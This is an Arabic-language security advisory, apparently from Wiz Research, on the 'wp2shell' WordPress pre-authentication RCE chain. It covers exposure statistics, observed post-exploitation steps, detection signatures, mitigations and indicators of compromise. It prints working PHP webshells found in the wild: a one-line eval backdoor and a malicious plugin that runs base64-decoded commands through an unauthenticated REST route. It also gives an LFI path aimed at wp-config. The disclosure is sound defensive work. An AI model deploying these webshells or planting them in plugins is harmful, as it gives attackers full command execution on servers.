ما هي CVE-2026-63030 وCVE-2026-60137؟

تشتمل هذه الثغرات الأمنية على سلسلة هامة لتنفيذ التعليمات البرمجية عن بُعد (RCE) للمصادقة المسبقة في WordPress Core، والتي يطلق عليها اسم “wp2shell”، والتي اكتشفها Searchlight Cyber ​​باستخدام OpenAI GPT 5.6 Sol، وتم نشرها في 17 يوليو 2026. تسمح سلسلة الاستغلال هذه للمهاجمين غير المصادقين بتنفيذ التعليمات البرمجية عن بُعد على عمليات تثبيت WordPress الافتراضية في أي إصدار WordPress تم إصداره منذ ديسمبر 2025.

ما هي المخاطر التي تتعرض لها البيئات السحابية؟

تشير بياناتنا إلى أن 60% من المؤسسات التي تستخدم WordPress كان لديها في البداية مثيل واحد ضعيف على الأقل في وقت نشر هذه التهديدات الخطيرة، وأن 25% منها كانت تعرض خادمًا ضعيفًا للإنترنت. ومع ذلك، فإن هذا الرقم يتناقص بسرعة مع قيام المؤسسات بالتصحيح، حيث انخفض إلى 50% و10% على التوالي خلال 24 ساعة من النشر الأولي.

ما هو دليل الاستغلال الذي حددته شركة Wiz Research؟

مباشرة بعد نشر سلسلة الثغرات الأمنية، تم توفير العديد من نقاط POC للاستغلال من قبل الباحثين الأمنيين، وكان معظمها يقتصر على حقن SQL في تكوينات WordPress الافتراضية مع السماح بـ RCE في ظل ظروف محددة. ومع ذلك، حققت POCs لاحقًا RCE ضد أهداف تعسفية.

لقد لاحظنا حتى الآن أن العديد من الجهات الفاعلة تستغل بنجاح سلسلة الثغرات الأمنية هذه ضد مثيلات WordPress المستضافة ذاتيًا في السحابة. بعد نجاح استغلال واجهة برمجة التطبيقات دفعة واحدة، لاحظنا أنشطة ما بعد الاستغلال التالية:

  • تحميل البرنامج المساعد الضار – الوصول إلى المهاجمين /wp-admin/plugin-install.php?tab=upload وتنفيذها بنجاح POST /wp-admin/update.php?action=upload-plugin، لتثبيت أبواب خلفية مستمرة.

  • تعداد المستخدم – أرسل المهاجمون طلبات إلى /wp-json/wp/v2/users?context=edit لجمع أسماء المستخدمين وعناوين البريد الإلكتروني للمشرف.

  • محاولات تضمين الملف المحلي – نفذ المهاجمون هجمات LFI عبر admin-ajax.php?template=../../../wp-config، استهداف بيانات اعتماد قاعدة البيانات ومفاتيح المصادقة للتسلل.

  • الوصول إلى لوحة الإدارة – الوصول إلى المهاجمين /wp-admin/ وتلقى استجابات HTTP 200 تشير إلى جلسات المصادقة الناجحة.

لقد لاحظنا أيضًا نشاط مسح كبير الحجم دون استغلال لاحق، مما يشير إلى حملات مسح جماعي انتهازية تسعى إلى تحديد الأهداف الضعيفة إلى جانب نشاط المسح الأمني ​​المشروع. لم نحدد بعد الحركة الجانبية أو تسرب البيانات، لكننا نواصل المراقبة والتحقيق.

فيما يتعلق بالبرامج الضارة المنتشرة، كان من بين النتائج التي توصلنا إليها اثنتين من أغطية الويب PHP التي تمثل طرفي نقيض من طيف التطور. الأول كان عبارة عن سطر واحد بسيط:

<?php
eval($_POST['[REDACTED]']??'http_response_code(404);');

هذا باب خلفي أساسي يوفر تنفيذ تعليمات برمجية عن بعد لأي شخص يعرف اسم المعلمة، ويعيد 404 كأسلوب للتهرب. نحن نرى بانتظام هذه الأنواع من أغطية الويب يتم نشرها بعد معظم ثغرات RCE الجديدة؛ إنها واحدة من أكثر أنواع النتائج شيوعًا عند التحقيق في الاستغلال الجماعي لثغرة أمنية ناشئة.

أما الثاني فكان عبارة عن قالب ويب ضخم بحجم 150 كيلو بايت متنكر في شكل مكون إضافي لـ WordPress يسمى “CMSmap”. يعد المكون الإضافي الشرعي الأصلي أداة أمان بسيطة، ولكن هذه العينة تتضمن منصة هجوم كاملة الميزات مع واجهة رسومية، ومصادقة كلمة المرور، ومجموعة واسعة من الإمكانات بما في ذلك إدارة الملفات، والوصول إلى قاعدة البيانات، ومسح المنافذ، وحقن التعليمات البرمجية الدفعية، ووحدات تصعيد الامتيازات المتعددة بما في ذلك استغلال MySQL UDF.

يتم حجب الحمولة من خلال تسلسل سلسلة بترميز سداسي عشري وترميز Base64 مضغوط بـ gzip، ويتم تفكيكها في وقت التشغيل عبر eval(gzuncompress(base64_decode(...))).

تتطابق الحمولة الداخلية بشكل وثيق مع PHP webshell المعروف مع المتغيرات المعدلة مثل اسم القشرة وكلمة المرور.

كان البرنامج الإضافي الخبيث الثالث لـ WordPress الذي لاحظناه هو أيضًا PHP webshell. عن طريق تسجيل نقطة نهاية REST API مخصصة (/morning/v1/[REDACTED]) مع رد اتصال متساهل (__return_true)، فهو يسمح للمهاجمين بإرسال طلبات POST تحتوي على أمر مشفر بـ base64 في المعلمة. يقوم المكون الإضافي بفك تشفير هذا الأمر وتنفيذه على الخادم الأساسي، والتقاط الإخراج للعودة في استجابة JSON، مما يمنح المهاجم الوصول الكامل على مستوى الأمر بشكل فعال:

<?php
/* Plugin Name: gg-[REDACTED] */
add_action('rest_api_init', function () {
    register_rest_route('morning/v1', '/[REDACTED]', array(
        'methods' => 'POST',
        'permission_callback' => '__return_true',
        'callback' => function ($request) {
            ob_start();
            passthru(base64_decode($request->get_param('c')) . ' 2>&1');
            $output = ob_get_clean();
            require_once ABSPATH . 'wp-admin/includes/plugin.php';
            return new WP_REST_Response(array(
                'marker' => '[REDACTED]',
                'output' => $output,
            ));
        },
    ));
});

كيف يمكن لمستخدمي WordPress اكتشاف الاستغلال؟

تسيء الثغرة الأمنية استخدام نقاط نهاية المعالجة المجمعة لـ WordPress REST API (/?rest_route=/batch/v1 أو /wp-json/batch/v1) لتنفيذ تعليمات برمجية غير مصادق عليها. من وجهة نظر الكشف، أثبتت استجابات HTTP 207/200 متعددة الحالات لطلبات نقطة النهاية المجمعة أنها مؤشر عالي الدقة نسبيًا للاستغلال الناجح (كما لاحظت Hexastrike أيضًا)، في حين أن سلاسل وكيل المستخدم التي تحتوي على wp2shell و rezwp2shell عملت أيضًا كتوقيعات موثوقة للأدوات تحدد أطر الاستغلال المصممة لهذا الغرض.

ما هي المنتجات التي تتأثر؟

CVE-2026-63030 وCVE-2026-60137 (سلسلة برمجيات RCE الكاملة):

CVE-2026-60137 (SQLi):

ما هي الإجراءات التي يجب على فرق الأمن اتخاذها؟

  1. قم بتحديث WordPress إلى الإصدار الثابت للبائع.

  2. كتخفيف مؤقت، يمكن للمؤسسات التي لا يمكنها التحديث على الفور تقييد الوصول المجهول إلى WordPress Batch API عن طريق حظر /wp-json/batch/v1 نقطة النهاية (أو ?rest_route=/batch/v1) في جدار حماية تطبيق الويب (WAF)، أو عن طريق تعطيل الوصول المجهول إلى REST API باستخدام مكون إضافي.

كيف يمكن أن يساعد ويز؟

يجب على عملاء Wiz الرجوع إلى النصائح المعدة مسبقًا في Wiz Threat Intel Center للحصول على خطوات قابلة للتنفيذ للتحقيق في بيئاتهم ومعالجتها وتقويتها. ستواصل Wiz Research تحديث هذه النصائح مع تطور الوضع.

مؤشرات التسوية (IOCs)

مؤشر وصف
2a1410d8e2a8337ac2171cedea8c0fdc47c647a0 PHP ويبشيل
58eca847e9eae9e6b08cc211f1559817b71bc4cc PHP ويبشيل
ebea44890f434d5d67ede22009a3f4bb5cac33f8 PHP ويبشيل
d9a220c8039f1c4d72cae7ccb8b3a33dec8815be PHP ويبشيل
e9756e2338f84746007235e4cab7a70d5b3ca47f PHP ويبشيل
45.79.167[.]238 عنوان IP المستخدم للاستغلال
34.81.132[.]62 عنوان IP المستخدم للاستغلال
79.177.131[.]206 عنوان IP المستخدم للاستغلال
15.157.135[.]170 عنوان IP المستخدم للاستغلال
94.100.52[.]128 عنوان IP المستخدم للاستغلال
172.235.128[.]52 عنوان IP المستخدم للمسح الشامل
شاركها.
اترك تعليقاً